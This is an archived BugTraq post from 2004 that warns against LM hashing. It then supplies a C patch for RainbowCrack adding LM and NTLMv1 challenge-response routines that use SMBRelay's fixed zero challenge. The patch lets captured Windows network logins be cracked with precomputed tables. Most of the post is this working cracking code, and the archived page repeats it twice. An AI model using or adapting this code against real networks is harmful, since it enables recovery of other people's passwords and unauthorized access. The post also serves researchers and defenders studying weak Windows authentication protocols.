BugTraq
Back to list
|
Post reply
Rainbow tables for LM/NTLMv1 authentication
Sep 14 2004 10:06AM
Hidenobu Seki (seki atc yamatake co jp)
Hello,
I would recommend to read a Robert Hensing article.
Why you shouldn't be using passwords of any kind on your Windows networks . . .
http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
And, I don't recommend to rely on NoLMHash.
http://www.securityfriday.com/Topics/winxp1.html
Kind regards,
Urity
RainbowCrack with a SMB server throwing a fixed challenge:
// for rainbowcrack-1.2-src-algorithmpatch
// Ophcrack? for your homework.
// for HashRoutine.h
// LM authentication
void HashNetLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash);
// NTLMv1 authentication
void HashNetNTLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash);
// for HashRoutine.cpp
// LM authentication
AddHashRoutine("netlm", HashNetLM, 24);
// NTLMv1 authentication
AddHashRoutine("netntlm", HashNetNTLM, 24);
// for HashAlgorithm.cpp
// LM authentication
void HashNetLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash)
{
int i;
for (i = nPlainLen; i < 14; i++)
pPlain[i] = 0;
static unsigned char magic[] = {0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25};
static unsigned char chllng[8] = {0}; // the fixed challenge of SMBRelay
des_key_schedule ks;
unsigned char lm[21];
setup_des_key(pPlain, ks);
des_ecb_encrypt((des_cblock*)magic, (des_cblock*)lm, ks, DES_ENCRYPT);
setup_des_key(&pPlain[7], ks);
des_ecb_encrypt((des_cblock*)magic, (des_cblock*)&lm[8], ks, DES_ENCRYPT);
setup_des_key(lm, ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)pHash, ks, DES_ENCRYPT);
setup_des_key(&lm[7], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[8], ks, DES_ENCRYPT);
if (nPlainLen < 8)
{
pHash[16] = 0x57; pHash[17] = 0xE9; pHash[18] = 0xA1; pHash[19] = 0xB7;
pHash[20] = 0x95; pHash[21] = 0x40; pHash[22] = 0xC3; pHash[23] = 0x74;
}
else
{
lm[16] = lm[17] = lm[18] = lm[19] = lm[20] = 0;
setup_des_key(&lm[14], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[16], ks, DES_ENCRYPT);
}
}
// NTLMv1 authentication
void HashNetNTLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash)
{
unsigned char UnicodePlain[MAX_PLAIN_LEN];
int len = (nPlainLen < 127) ? nPlainLen : 127;
int i;
for (i = 0; i < len; i++)
{
UnicodePlain[i * 2] = pPlain[i];
UnicodePlain[i * 2 + 1] = 0x00;
}
static unsigned char chllng[8] = {0}; // the fixed challenge of SMBRelay
des_key_schedule ks;
unsigned char lm[21];
MD4(UnicodePlain, len * 2, lm);
lm[16] = lm[17] = lm[18] = lm[19] = lm[20] = 0;
setup_des_key(lm, ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)pHash, ks, DES_ENCRYPT);
setup_des_key(&lm[7], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[8], ks, DES_ENCRYPT);
setup_des_key(&lm[14], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[16], ks, DES_ENCRYPT);
}
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Hello,
I would recommend to read a Robert Hensing article.
Why you shouldn't be using passwords of any kind on your Windows networks . . .
http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
And, I don't recommend to rely on NoLMHash.
http://www.securityfriday.com/Topics/winxp1.html
Kind regards,
Urity
RainbowCrack with a SMB server throwing a fixed challenge:
// for rainbowcrack-1.2-src-algorithmpatch
// Ophcrack? for your homework.
// for HashRoutine.h
// LM authentication
void HashNetLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash);
// NTLMv1 authentication
void HashNetNTLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash);
// for HashRoutine.cpp
// LM authentication
AddHashRoutine("netlm", HashNetLM, 24);
// NTLMv1 authentication
AddHashRoutine("netntlm", HashNetNTLM, 24);
// for HashAlgorithm.cpp
// LM authentication
void HashNetLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash)
{
int i;
for (i = nPlainLen; i < 14; i++)
pPlain[i] = 0;
static unsigned char magic[] = {0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25};
static unsigned char chllng[8] = {0}; // the fixed challenge of SMBRelay
des_key_schedule ks;
unsigned char lm[21];
setup_des_key(pPlain, ks);
des_ecb_encrypt((des_cblock*)magic, (des_cblock*)lm, ks, DES_ENCRYPT);
setup_des_key(&pPlain[7], ks);
des_ecb_encrypt((des_cblock*)magic, (des_cblock*)&lm[8], ks, DES_ENCRYPT);
setup_des_key(lm, ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)pHash, ks, DES_ENCRYPT);
setup_des_key(&lm[7], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[8], ks, DES_ENCRYPT);
if (nPlainLen < 8)
{
pHash[16] = 0x57; pHash[17] = 0xE9; pHash[18] = 0xA1; pHash[19] = 0xB7;
pHash[20] = 0x95; pHash[21] = 0x40; pHash[22] = 0xC3; pHash[23] = 0x74;
}
else
{
lm[16] = lm[17] = lm[18] = lm[19] = lm[20] = 0;
setup_des_key(&lm[14], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[16], ks, DES_ENCRYPT);
}
}
// NTLMv1 authentication
void HashNetNTLM(unsigned char* pPlain, int nPlainLen, unsigned char* pHash)
{
unsigned char UnicodePlain[MAX_PLAIN_LEN];
int len = (nPlainLen < 127) ? nPlainLen : 127;
int i;
for (i = 0; i < len; i++)
{
UnicodePlain[i * 2] = pPlain[i];
UnicodePlain[i * 2 + 1] = 0x00;
}
static unsigned char chllng[8] = {0}; // the fixed challenge of SMBRelay
des_key_schedule ks;
unsigned char lm[21];
MD4(UnicodePlain, len * 2, lm);
lm[16] = lm[17] = lm[18] = lm[19] = lm[20] = 0;
setup_des_key(lm, ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)pHash, ks, DES_ENCRYPT);
setup_des_key(&lm[7], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[8], ks, DES_ENCRYPT);
setup_des_key(&lm[14], ks);
des_ecb_encrypt((des_cblock*)chllng, (des_cblock*)&pHash[16], ks, DES_ENCRYPT);
}
[ reply ]